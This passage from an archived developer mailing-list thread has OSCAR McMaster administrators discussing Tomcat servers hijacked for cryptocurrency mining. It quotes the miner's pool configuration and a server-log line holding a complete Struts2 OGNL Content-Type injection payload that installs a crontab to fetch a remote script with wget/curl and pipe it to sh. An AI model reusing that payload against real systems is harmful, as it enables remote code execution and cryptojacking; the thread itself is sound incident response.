>>>> program using their configuration file below.
>>>>
>>>> {
>>>>     "url" : "stratum+tcp://37.59.51.212:80",
>>>>     "user" :
>>>> "43We5FWNCmqffXY5tHriA3LMqhCRgXP9uZvMAZ8gfG7SYaLdQTpo2GGPDjk6zWdGAe6RedPTRhmC1EkGnAY3dPE62H3Gu8R",
>>>>     "pass" : "x",
>>>>     "algo" : "cryptonight",
>>>>     "quiet" : true
>>>> }
>>>>
>>>> Solution:
>>>> If you delete the folder it will create it again via the crontab
>>>> If you delete the crontab it will find a way to login and create another
>>>> one if your system is already compromised
>>>>
>>>> The solution that I found effective is to deny crontab service to tomcat
>>>> (tomcat6,tomcat7 or whatever tomcat version you are using)
>>>> and assigned long password to your tomcat user.
>>>>
>>>> use "netstat -Wcatnp" to check if your system is still connected to
>>>> their site (look for any of the ip address above)
>>>> and kill the process.
>>>>
>>>> Muki
>>>>
>>>> ------------------------------------------------------------------------------
>>>> Check out the vibrant tech community on one of the world's most
>>>> engaging tech sites, Slashdot.org!
>>>> http://sdm.link/slashdot_______________________________________________
>>>> Oscarmcmaster-devel mailing list
>>>> [hidden email]
>>>> https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel
>>>>
>>>>
>>>>
>>>>
>>>> ------------------------------------------------------------------------------
>>>> Check out the vibrant tech community on one of the world's most
>>>> engaging tech sites, Slashdot.org! http://sdm.link/slashdot
>>>> _______________________________________________
>>>> Oscarmcmaster-devel mailing list
>>>> [hidden email]
>>>> https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel
>>>>
>>>
>>>
>>>
>>> --
>>> +
>>> Thom Luxford, B.HK B.CS
>>> Project Manager IT
>>> bCMDit Services Ltd.
>>> (866) 922-6348, ext 101
>>>
>>>
>>> ------------------------------------------------------------------------------
>>> Check out the vibrant tech community on one of the world's most
>>> engaging tech sites, Slashdot.org! http://sdm.link/slashdot
>>> _______________________________________________
>>> Oscarmcmaster-devel mailing list
>>> [hidden email]
>>> https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel
>>>
>>
>>
>>
>> ------------------------------------------------------------------------------
>> Check out the vibrant tech community on one of the world's most
>> engaging tech sites, Slashdot.org! http://sdm.link/slashdot
>> _______________________________________________
>> Oscarmcmaster-devel mailing list
>> [hidden email]
>> https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel
>>
>
>
>
> --
> Marc Dumontier
> 519-584-5601
> http://www.hxb.ca
> http://www.oscarmcmaster.org
>
> ------------------------------------------------------------------------------
> Check out the vibrant tech community on one of the world's most
> engaging tech sites, Slashdot.org!
> http://sdm.link/slashdot_______________________________________________
> Oscarmcmaster-devel mailing list
> [hidden email]
> https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel
>
>
>
> ________________________________
> ------------------------------------------------------------------------------
> Check out the vibrant tech community on one of the world's most
> engaging tech sites, Slashdot.org! http://sdm.link/slashdot
>
> ________________________________
> _______________________________________________
> Oscarmcmaster-devel mailing list
> [hidden email]
> https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel
>
>
> ------------------------------------------------------------------------------
> Check out the vibrant tech community on one of the world's most
> engaging tech sites, Slashdot.org! http://sdm.link/slashdot
>
>
>
> _______________________________________________
> Oscarmcmaster-devel mailing list
> [hidden email]
> https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel
>
>
>
> ------------------------------------------------------------------------------
> Check out the vibrant tech community on one of the world's most
> engaging tech sites, Slashdot.org! http://sdm.link/slashdot
> _______________________________________________
> Oscarmcmaster-devel mailing list
> [hidden email]
> https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel
>

------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot
_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel
Reply | Threaded
Open this post in threaded view
|  
Report Content as Inappropriate

Re: Tomcat Vulnerability - Will bring down tomcat server

ianpun
As for the entry vector, did someone had access as a tomcat user or root user (should be disabled)?  I run my cron backup script as a regular oscar user (mysqldump, rsync) ,  not root or tomcat. Still using denyhosts daemon for blacklisting brute force ssh attack and ssh port is not standard 22.

Ian
Reply | Threaded
Open this post in threaded view
|  
Report Content as Inappropriate

Re: Tomcat Vulnerability - Will bring down tomcat server

senendds
I'm suffering the same attack. I've a webapp using struts2, and I've this in my logs:

org.apache.commons.fileupload.FileUploadBase$InvalidContentTypeException: the request doesn't contain a multipart/form-data or multipart/form-data stream, content type header is %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "*/20 * * * * wget -O - -q http://91.230.47.40/icons/logo.jpg|sh\n*/19 * * * * curl http://91.230.47.40/icons/logo.jpg|sh" | crontab -;wget -O - -q http://91.230.47.40/icons/logo.jpg|sh').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

I guess the attacker is using a form to send some content to an struts action, that content is parsed by OGNL and as a result the crontab is created.

The funny thing is that even with the tomcat user in the cron.deny file, the attack is still happening.
Reply | Threaded
Open this post in threaded view
|  
Report Content as Inappropriate

Re: Tomcat Vulnerability - Will bring down tomcat server

Peter Hutten-Czapski-2
I have been looking into this
I don't know if this is it but there is a known struts vulnerability
All the hacker needs to do is to access tomcat and then they can address arbitary code as the tomcat user provided in the url. The affected parser mishandles file upload, which lets remote attackers execute arbitrary commands via a #cmd= string in a specially crafted Content-Type HTTP header

================
Peter Hutten-Czapski
Haileybury Ontario

"The attitude that ‘if rural people want these services they’ll have to come to the city to get them’ is simply not acceptable…” (Newbery, 1999)

Before printing, think about the environment. Avant d' imprimer, pensez à l'environnement.

On 28 June 2017 at 06:15, senendds <[hidden email]> wrote:
I'm suffering the same attack. I've a webapp using struts2, and I've this in
my logs:



I guess the attacker is using a form to send some content to an struts
action, that content is parsed by OGNL and as a result the crontab is
created.

The funny thing is that even with the tomcat user in the cron.deny file, the
attack is still happening.



--
View this message in context: http://oscarmcmaster.16.x6.nabble.com/Tomcat-Vulnerability-Will-bring-down-tomcat-server-tp5009726p5009829.html
Sent from the oscarmcmaster-devel mailing list archive at Nabble.com.

------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot
_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel



------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot
_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel
Reply | Threaded
Open this post in threaded view
|  
Report Content as Inappropriate

Re: Tomcat Vulnerability - Will bring down tomcat server

Peter Hutten-Czapski-2
If so should we be taking down publicly (web) facing oscars?

================
Peter Hutten-Czapski
Haileybury Ontario

"The attitude that ‘if rural people want these services they’ll have to come to the city to get them’ is simply not acceptable…” (Newbery, 1999)

Before printing, think about the environment. Avant d' imprimer, pensez à l'environnement.

On 28 June 2017 at 10:02, Peter Hutten-Czapski <[hidden email]> wrote:
I have been looking into this
I don't know if this is it but there is a known struts vulnerability
All the hacker needs to do is to access tomcat and then they can address arbitary code as the tomcat user provided in the url. The affected parser mishandles file upload, which lets remote attackers execute arbitrary commands via a #cmd= string in a specially crafted Content-Type HTTP header

================
Peter Hutten-Czapski
Haileybury Ontario

"The attitude that ‘if rural people want these services they’ll have to come to the city to get them’ is simply not acceptable…” (Newbery, 1999)

Before printing, think about the environment. Avant d' imprimer, pensez à l'environnement.

On 28 June 2017 at 06:15, senendds <[hidden email]> wrote:
I'm suffering the same attack. I've a webapp using struts2, and I've this in
my logs:



I guess the attacker is using a form to send some content to an struts
action, that content is parsed by OGNL and as a result the crontab is
created.

The funny thing is that even with the tomcat user in the cron.deny file, the
attack is still happening.



--
View this message in context: http://oscarmcmaster.16.x6.nabble.com/Tomcat-Vulnerability-Will-bring-down-tomcat-server-tp5009726p5009829.html
Sent from the oscarmcmaster-devel mailing list archive at Nabble.com.

------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot
_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel




------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot
_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel
12
Loading...